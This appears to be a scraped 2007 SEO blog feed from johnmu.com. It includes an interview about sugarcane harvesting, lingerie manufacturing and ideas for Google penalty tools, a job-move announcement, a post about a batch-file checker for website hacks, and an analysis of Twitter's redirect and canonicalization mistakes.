Sugarcane harvesters chop up cane into little lengths, about 8 inches long, called billets. Along with the cane, the leaf material is also chopped up. If that leaf material reaches the mill, it can have a bad affect on the quality of the sugar produced, and it also makes the cane more expensive to process and transport. So, the harvesting machines have big 6 foot metal fans which rotate at about 1000 rpm – that’s a phenomenal tip speed. These fans sit above the cane right after it’s been chopped, and their aim is to remove the leaf material. Unfortunately, a whole complex set of interactions conspire to result in a situation where if you try ‘too hard’ to remove the leaf material, you also end up losing about 20% of the cane you harvest through those fans – but it’s invisible. A billet that’s gone through an extractor fan ends up looking something like dessicated coconut – and there is no way of knowing the losses exist unless you do scientific trials to prove it.

I’d done the trials – all through North Queensland, in Papua New Guinea – all over the place. We had proved the losses existed, and the cost to the industry was in the billions of dollars per year, let alone the environmental impact. But because you can’t actually SEE the losses, you have a hard time convincing people that they actually exist. We got to the stage where my team and I had convinced the industry that there was a serious problem, and the next step was obviously “How do we stop it”. We knew that there was a ‘sweet spot’ where those losses could be reduced to around 5% depending upon the way the harvester was operated. Since we didn’t have the ability to measure what was happening in the field on a real time basis, we had no choice but to use indirect measurements in the mill – like fibre, the sweetness of the cane etc, to try and infer what was happening in the field – to measure ‘quality’ of the job.

That became my focus, and I learnt along the way that when you’re trying to make a reward system based upon derived measures, the tiniest little change to your algorithm can have huge impacts upon the system you’re trying to model. Also, if you’re offering “rewards” based upon indirect measurements, you actually end up becoming an intrinsic part of the system you’re trying to model – in clearer terms, the whole system tends to change or adapt to maximize “profits”, which can play havoc with the “accuracy” of your algorithm.

It sounds completely unrelated, but that’s actually Google (and the spam struggle) in a nutshell. That’s one of the reasons I’m fascinated with it and feel at home here in the groups where occasionally we get questions that make me think quite deeply about the challenges Google must face – and we get the opportunity to debate our views :) This thread about pagerank where Craig and I duked it out with full respect for each others opinion is one example I can think of that I’ve enjoyed.

You studied Agriculture and set up a shop to make and sell backless lingerie. I bet all the guys in the groups have visited your full site (for SEO reasons, I’m sure ;) ). How did that ever come about?

Ha – not only did I study Ag, but I managed to convince the government here to award me a scholarship to do a coursework Master’s degree in Computer and Comms engineering. I ended up with a few awards and an aggregate score of over 93% – without an undergrad engineering degree – I think that surprised everyone, even me :-) . But I guess it’s only natural – most people do best when they’re doing something they love. I’ve always been fascinated with those applications where IT, Engineering and Science intersect and meet ‘the real world’ – that’s kind of Googly.

An example – I can remember the time when I was about 12 years old that I blew up the family commodore 64 trying to get it to drive solenoids to water the garden for Mum. I didn’t realise at the time that you need a transistor and a relay if you want to drive something hefty like a solenoid with a TTL output :-)

But apart from being a bit of a terror, I’ve also always been a traveler and got along easily with folks. As such, when I was writing my Masters thesis, I figured I’d go stay with some mates overseas – I had a load of frequent flyer points I wanted to use, they all offered to put me up for free, so I figured it was an opportunity too good to miss. The only ‘gotcha’ was that I was to provide the beer – Norway was a hoot – my oh my – the Vikings ARE NOT dead!

I ended up (between parties) writing most of my Master’s degree tapping away on my laptop, perched on the edge of a fjord whilst staying with my Norwegian Marine Biologist friend in Northern Norway for a few months mid 2005 – the 24 hour sunlight was GREAT.

On the way back I dropped in to see my Indian mate in Tirupur (the south of India, in a state called Tamil Nadu) and ended up spending a few months there too. Tirupur is a big textile producing area, and I made friends with some of the big players there.

When I finally arrived back in Australia I mentioned that to my Brother in Law (a solicitor) and he said “well, I’ve got some clients that are looking to manufacture a neat new product they’ve developed” – so, before I knew it, I was off to India where I learnt all about ladies underwear, mobilon and thread density. We quickly got a few test shipments under our belt.

Upon returning my brother and I were asked if we’d like to get more deeply involved with the sale and promotion of the product – somehow I let myself be convinced. There began the roller coaster ride – I became manufacturer (traveled to China as well for that part several times), web developer, email wrangler, undy packer, book keeper, promoter and media spokesperson. It was crazy work and it was unpaid – the cost of manufacture and promotion sucked away much of my savings and any profit the product brought in before it ever had a chance to reach my pocket – although attending the modeling shoots was fun, and the POSSIBILITY that it might become something big was intoxicating!

But – a word from the wise – ever heard of Ali Baba and the 40 Thieves? Those folk were in the rag trade :-) Get involved at your peril.

One of your sites has recently had a strange kind of trouble with Google’s index, with all sorts of possible explanations but no resolution so far. For the average webmaster these kinds of situations are incomprehensible and terribly frustrating. What would you tell the webmaster when stuck in a rut like that – keep working on the problem or let it sit for a while?

First I’d ask them to think about whether they’d made any big changes to their site recently – to try and hone in on whether it might be something they’d caused themselves, rather than anything algorithmic.

Next, if I’d decided it might indeed be a penalty, I’d usually give them a copy of the webmaster guidelines and say “What do you think it might be?” – people usually have a fairly good idea about what they might have done wrong if a potential penalty is involved. I’d then ask them to write out a list of potential issues, and correct them + submit a reconsideration request and wait a month. If that didn’t work, time to put on the “mad scientist” hat and get methodical about things.

First I’d probably use Google to do a search for other people experiencing the problem. From there I’d approach these groups. If that drew blanks, I’d then start tweaking things with their site – but softly softly – one change at a time, waiting at least a week between changes so that I’d have a fair idea what ‘the cure’ was for future reference.

If that didn’t work I’d probably just start to assume that they were the victim of Google collateral damage – hell, we all know it happens, and I’d be submitting some attention grabbing posts to this group to try and ‘elevate it’ to the attention of Googlers, so that they could use their gadgetry to try and work out what the story was.

At that stage things are out of your hands, and you just hope that perhaps you’ve alerted Google to a potential “Googlebug” that might stop others from experiencing the same kinds of issues.

Assuming you had full access to Google’s servers and some web designers + programmers to help you, what would you change?

Hmmm.. looking back through my prep notes for my Google interview here…

I think I’d start with the problem of penalties. I’d be sitting down with the alg team and trying to thrash out a way that we could actually help those ‘ma and pa’ webmasters that have accidentally shot themselves in the foot – and to do so without giving the spammers a leg up.

I’d write out a list of things that we considered ‘top secret’ and another of those factors that were ‘out of the bag’, and I’d set about implementing changes to Google webmaster tools to alert folks to little things – like obviously hidden text – that might be resulting in a penalty and which they might not know about. Those kind of issues, to my mind anyway, are already well known amongst spammers and you can’t lose much by letting people know about them.

As for the more complex things, like, for example, keyword density (it’s a simple one, I know, but let’s start there) – you know, things that aren’t black or white – things where there were shades of grey, I’d be making tools to show them which side of the line they are tending towards – like a gauge, or traffic lights.

“We think your site is looking a little spammy – here’s an orange alert”.

Naturally, the alg team would then say to me “Well Matt, that’s all well and good, but if we start giving folks that kind of info, we’re essentially giving the spammers a great tool which they can use to test the limits of our alg, too”. I’d then say to them, well, why don’t we use cluster analysis to break sites down into 100 different categories of ‘spamminess’ – the traffic lights would just show how spammy you are relative to others in your ‘spamminess cluster’ – so really, if we give a green light to a known spammer, all we are telling him is that he’s kind of ok compared to the other spammers within his uber spammer group – but he needn’t know that :-)

For the spammers, the lights system would achieve nothing. For the ma’s and pa’s that are relatively innocuous, having a red light could be a huge help – just knowing you have a penalty lets you know that it’s actually something you can track down and correct.

But I suspect the other engineers would raise a whole load of reasons that my approach wouldn’t work – but I love the dynamics of a group, and part of the enjoyment of working in one is often the synergy that you find when you’re sitting down with a whole bunch of folks with common interests and intellect thrashing out a new idea – that’s how a lump of coal turns into a diamond.

That would be a plum position to be in.

After that I’d probably start gravitating towards the alg design / testing side of things – as that’s something I’m fascinated with – setting up mega test networks and conducting sensitivity analysis and pre-testing of new algorithm ideas would be lots of fun and extraordinarily satisfying – I love taking good ideas and helping make them better.

I’ve also thought I’d like to make a tool that shows a graphical representation of the linking structure of a site – with things like nofollow, noindex as an overlay – that could be a great troubleshooting tool for lots of problems too.

But, to be honest, most of my programming experience is at the nuts and bolts level – A GUI to me is a command line and a prompt – I’ve got a lot of engineer in me. I’d be able to write the crawlers and mangle the database, but I’d have to leave the bells and whistles to someone else :-)

You’ve done a lot of different things (so far, including an interview with Google). If you could rewind back to when you started studying, do you think you would do anything differently knowing what you know now (other than obviously buying some good stock)?

Cool! A rewind button!

Firstly, I wouldn’t have flown Qantas to my big interview – it was a debacle start to finish – they lost my bags (clothes, books, notes) my flights out (and back) were both delayed 12 hours or more and diverted because of tech probs – in short, I arrived sleep deprived and not feeling prepared, and I think I only hit my feet during the interview just after lunch. It was like an out-of-body experience.. grrr….

Secondly – I wouldn’t have studied Agriculture.

We had loads of fun out there, but my natural aptitudes are IT / Science / Engineering. My ag degree included a lot of that, but I tended to get let down by the sheer boredom of prac sessions that included watching grass grow – honestly.

I’m the kind of person that thrives on a challenge – so I did poorly at the “watching grass grow” practical subjects, and tended to dux the more academic subjects that others found a tad difficult – like advanced stats, biometry etc – I did the wrong degree for my skillset and, like it or not, time is a depreciating commodity.

I’m an extremely outdoors person, and I thought back then that if I studied IT or engineering I’d be stuck in front of a computer all day – but I now realize that that’s not really the case at all. Shucks, if I’m honest with myself, I LIKE spending time in front of the computer. I’ve come to realise that it’s the life / work balance that’s important – if you don’t have one, you tend to lose out on the other.

So with Ag, I just ended up naturally gravitating towards work that required me to be ‘stuck’ in front of a computer all day anyway, but getting paid poorly for it, so the opportunities to go outside and do adventurous things in your spare time were limited.

I’ve had some massive, great interesting experiences with the route I chose back then, most of which I don’t regret, but if I’d done IT or Eng instead of Ag, I think I’d be in a better place, career wise. You mention “good stock” – it’s funny that, because luckily I realized early that this wasn’t what I wanted to do long term, and tended to invest my wages well – so I’ve managed to have a decent lifestyle during the recent ‘challenges’ which is LUCKY :-)

Is there anything you’d like to add?

John Congrats on the new job, and I’m looking forward to achieving a dream like that myself soon, too – good on you mate! :-)

Thank you very much for your time and the replies, Matt!

Copyright © 2010 johnmu.com. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact johnmu.com so we can take legal action immediately.
Plugin by Taragana

August 22nd 2007 News

By: How accurate is Google Analytics? | Maxmint

Comments Off on By: How accurate is Google Analytics? | Maxmint

[…] Why am I mentioning this? I just came across a post on the Seer Interactive Seo Blog where Wil Reynolds is stating that Google Analytics will dominate the analytics space. I have to agree that Google has a very big potential to take out the competition in the analytics market, I still wouldn’t be betting on one horse though. I want accurate data! If one counter says 10 visitors and the other stated 12, ok I can live with that. But if one says 1200 visitors and the other 1000, then something is wrong. What guarantee do you have if these statistics are accurate? […]

August 21st 2007 Uncategorized

Moving to a new office in September

Comments Off on Moving to a new office in September

the dream jobThe last couple years I’ve spent a lot of time in the Google Webmaster Help groups. Most of that time I’ve tried to help people with problems with their websites and Google. Together with the webmaster (every site is unique) and the other active members in the groups we’ve tried to work out where things are going wrong, what needs to be changed and often we’ve been able to fix things so that the website is back in the index, the content is getting found and hopefully, the webmaster has learned a thing or two. The best part for me is when a webmaster not only changes a few technicalities but is also able to take in and implement changes in strategy, changes that make the site even better for his visitors and in the end gets his unique content easily found. I love it when that works out!

I really enjoy these kinds of problems – finding a source of trouble in a giant heap of pages, using experience, guesses and estimations based on a “black box” that we know as Google. These puzzles keep your mind sharp and force you to think in a connected way. Sometimes you have to take a few steps back and look at the overall picture to find the real issues – and that’s something which is hard to do when you’re directly involved. Taking a look at the larger picture is something that takes a bit of practice, and thankfully it’s something that is done often in another place I love to be, cre8asite forums.

There’s a reason why I even got involved with all these puzzles in the first place: I know there is a lot of really important information out there that just can’t be found, and if it’s not findable, it will get lost. Perhaps forever. It might not be the solution to life, the universe and everything, but there is so much out there, online, on the web, that just can’t be found because of some technicality that the webmaster never thought about. On the one had, I want to help the webmaster to get found, on the other hand, I’d love to help the search engines to find his content, regardless of what technicalities he has forgotten.

Taking the next step

You can probably guess what’s coming up next 🙂 .

Come September, I’m going to be working for Google in their Zürich (Switzerland) office. I’m joining the team around the Webmaster Tools as a Webmaster Trends Analyst. Looking at the diagram above, being able to do that just about hits the sweet spot in the center – something I’m good at, something I love doing and then: something they’d even pay me to do. It doesn’t get any better. I can’t wait.

What will that mean for the GSiteCrawler and my other websites?

Fortunately I’ve been able to pass off almost everything to my old company, where they have someone who will be able to take over where I left off. At the moment the main problem is the language barrier (English vs German) – but I’m confident that it will improve. Please be patient as they get up to speed 🙂 – and of course remember that their main business has nothing to do with websites and search engines.

What will that mean for my forum presence?

It would be nice if I could be as present as ever – perhaps with some insights that can help even more. Realistically, however, I know it will take some time before everything settles down and I actually have enough time to do as much as I would like in the forums. Additionally, it will almost certainly mean less speculation on my part about things going on within the “black box” 😀 . My goal is to make sure that the communication between webmasters and the engineers at Google can continue to grow, in quantity and especially in quality. That might be through forum postings, through blog postings, at conferences or small meet-ups, with the help of tools and personalized notifications, perhaps even on Google-Talk.

What about this blog?

This blog will remain my personal blog. I won’t be speaking on behalf of Google here. The opinions expressed here are and will remain solely my own. Don’t ask me to make a comment on anything if you want an official answer :). And anyway: don’t trust anyone (even if he will soon work for Google), test it for yourself. Trust me on that. Errmm. Whatever.

Countdown to September

Please bear with me while I’m packing things up, tying up loose ends in the office and generally getting more and more nervous. I have a few blog posts that are prepared (in my head) which I hope to put online and a few more interviews to make. I can’t wait for September. Woohoo!

(The graphic is from Scott Hanselman’s blog, who’s doing the same move at about the same time, only to Microsoft instead. Congratulations, Scott!).

August 20th 2007 News

Check your web pages for hacks and unauthorized changes

Comments Off on Check your web pages for hacks and unauthorized changes

hidden-links.jpg Websites have become popular targets for hackers, who either try to add elements that automatically download “malware” (viruses, etc) or try to add hidden links (SEO hacking) to other websites. Quite often, these kinds of changes are not recognized by the webmaster or website owner. You could wait until a visitor complains to you or you receive a mail from Google for spreading malware (or having hidden links to “bad places”), but that is slow, unreliable and usually too late.

There are services available that can track changes on your web pages automatically, but sometimes it is good to have something like that within your own control (or perhaps as a backup to an online service). To keep a record of changes on web pages I have put together a small Windows batch-file that checks a list of pages and emails you with any changes found. Additionally, it will also email you when the server is not reachable. You could use the same tool to keep track of changes on third-party web pages.

The download is available here:

In order to use this tool, you will need two additional downloads:

Follow the instructions in the “readme.txt” within the ZIP file to install and set up this script.

Note: As mentioned in the instructions, you cannot list URLs with parameters directly – you need to use tinyurl.com to create a short version, which can be listed.

Once you have set the files up, make sure that the “checkurls.txt” file has the URLs that you want to track (as well as a short identifier) and then just doubleclick “checkall.bat”. You could also use the windows scheduler to automatically start that URL, or put a shortcut to it into your autostart folder to have it started whenever you log in.

One URL to test it with is http://johannesmueller.com/ – within that page the server embeds a counter as a HTML comment. The program should automatically signal that URL every time you start the program. If you include a URL like that within your list of URLs, you can be fairly certain that the program is working properly as long as you receive a notification for that URL.

The email sent to your account contains a listing of all changes (with line numbers) based on the windows tool “fc” (file compare).

The code (batch file) is released into public domain – but I would really appreciate a short notification of any changes that you might have done. Yeah, I know, batch files are sooo 80’s :-). It would be trivial (except perhaps for the file comparison) to convert this tool into something that runs standalone, but as a batch file almost anyone can modify it as they see fit, without any fancy programming environments installed.

August 19th 2007 Uncategorized

Twitter indexing peculiarities

Comments Off on Twitter indexing peculiarities

This post has one main reason: popular sites don’t always get it right. You can also turn that around: you don’t have to get everything right in order to be popular. Never do something on your site just because a large site does it like that.

Combine web 2.0 with a search engines, what do you get? Lots of rel=nofollow links :), heh. You’d assume that they could get a few things right with regards to search engine optimization though.

Think again.

I hope you’re listening, Twitter 😉 and all of you who aren’t.

Canonical redirects

A canonical domain redirect is one of the longest first specialized, technical, SEO-type words things that a webmaster learns to do. Google lets you set your preferred domain version in it’s Webmaster Tools, but you will usually still want to set up a 301 redirect for all the other engines. This is fairly simple to do on Apache, but you can also do it incorrectly.

Checking the server headers for http://www.twitter.com/ you see:

Results of the http://oyoy.eu/ server-headers test
Tested at 17.08.2007 21:12:59:

Result code: 302 (Found / Found)
Location: http://twitter.com/
Server: BIG-IP
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 0
New location: http://twitter.com/

Result code: 200 (OK / OK)
Connection: close
Date: Fri, 17 Aug 2007 21:13:00 GMT
Set-Cookie: _twitter_session=somelongnumber; domain=.twitter.com; path=/
Status: 200 OK
X-Runtime: 0.27641
ETag: “evenlongernumberhehehe”
Cache-Control: private, max-age=0, must-revalidate
Server: Joyent Web
Content-Type: text/html; charset=utf-8
Content-Length: 15000

The canonical redirect on twitter.com is incorrectly set up as a 302 redirect, not 301.

A 302 redirect can make sense if your site’s current main page is not the root URL – in that case, your server can 302 redirect from http://domain.com/ to http://domain.com/pages/cms/page.php?id=1 (or where ever your actual page is located). In that case, the search engines will see the temporary redirect and keep the original URL in the index, albeit with the content of the final URL.

Although Yahoo! was one of the first search engines to provide a strict set of guidelines with regards to 302 redirecting, you can see it best in their index. When you check the indexed URLs from www.twitter.com, you can click on the cache link, it will show where the actual content came from:

How bad is this problem? Well… Both Yahoo (approx 6’400 URLs) and MSN (approx 3’100 URLs) have www-versions of twitter.com in their index. Google seems to have interpreted the 302 redirect as a 301, perhaps because “twitter.com” is shorter than “www.twitter.com”.

One of the problems with the 302 redirect is that search engines might assume that they are still on the original URL, www.twitter.com, when it comes to interpreting links. This is problematic when links are relative, as many are on the Twitter pages. A link like <a href=”/friends/index/813286″ … > can be interpreted as being a link to “http://www.twitter.com/friends/index/813286”. By mixing relative linking with a broken canonical redirect, the site is effectively promoting the incorrect version of it’s URL.

Additional canonicalization problems

What, more canonicalization problems? Some servers are set up to serve the same content through https (the secure connection). If a server does that, it makes sense to block indexing of that content, either through a robots-meta-tag or (for Google) the new X-Robots tag in the HTTP header. Twitter has the https:-version of it’s URLs indexed – at least on Google (though you can’t query these separately), I didn’t spot any on Yahoo or MSN.

Even more canonicalization issues – getting your server’s IP address indexed

… is a really bad idea. What happens when you move? What happens to the cookies stored for the site? What happens when you want to expand and add a round-robin DNS system to spread the load over multiple servers?

Google (385’000 URLs), Yahoo (5’700 URLs) and MSN (22 URLs) all have Twitter’s IP address indexed. As far as I can tell, this arose from a glitch in their website some time back — many of the profiles were linked through the IP-address instead of the domain name (from the twitter.com domain name). The profiles are now linked with an absolute URL on “twitter.com”, but these used to be linked with a relative URL as well: further promoting the IP-addresses for twitter profiles.

On Apache, with a proper .htaccess file, this would be easy to fix: just have all accesses 301 redirected to the proper URL.

And even more canonicalization problems …..

Since the server responds to all requests with the content of twitter.com, any server name that resolves to Twitter’s IP address can get indexed. One domain that I found was gezwitscher.com (which means something like “twitter” in German). There are also several subdomains on other sites that resolve to that IP address.

Twitter has a canonicalization problem, though some of the engines are guessing more or less correctly about what should be indexed and what shouldn’t.

Use of rel=nofollow microformats on links

The original introduction of this microformat mentions that it can be used to prevent comment spam from gaining value through links. It has since been expanded to usage as a general block for the crawling of a link (though this is a bit controversial, as any link without rel=nofollow would result in crawling of the linked URL anyway).

Twitter has recently added the rel=nofollow microformat to all links that are posted by the users of Twitter (there are no anonymous comments to postings on Twitter). Other, internal links are without this microformat. However, the user’s homepages (from their profile) also have links without the rel=nofollow microformat (if a user regularly uses the site and has many friends who link to him, it can be assumed that the user’s homepage is not spammy). If the homepage is trusted, why would the other links that the user places not be trustworthy? The links are already locked behind “tinyurl” (it would be nice to see the final URL as a tooltip over the link, by the way), why add the nofollow?

Adding the nofollow microformat to the posted links does not seem consistent with the handling of the user’s homepage links. However, it’s still better to have just the homepage linked than not have any links at all.

If Twitter had to rely on traffic from search engines, these issues could have a big impact. I imagine Twitter does not have to rely on that traffic source, which makes issues like the above less important. However, since the profiles are indexable, perhaps they do want some sort of traffic from the search engines, at least based on those profiles.

So what …. ?

Twitter can get away with these mistakes because it doesn’t need the search engines. Most other sites are different and need all the help they can get – which includes technicalities like fixing the canonical redirect and reducing the number of URLs in use.

PS I have nothing against Twitter, in fact I really like to use it for quick updates :).

August 18th 2007 Uncategorized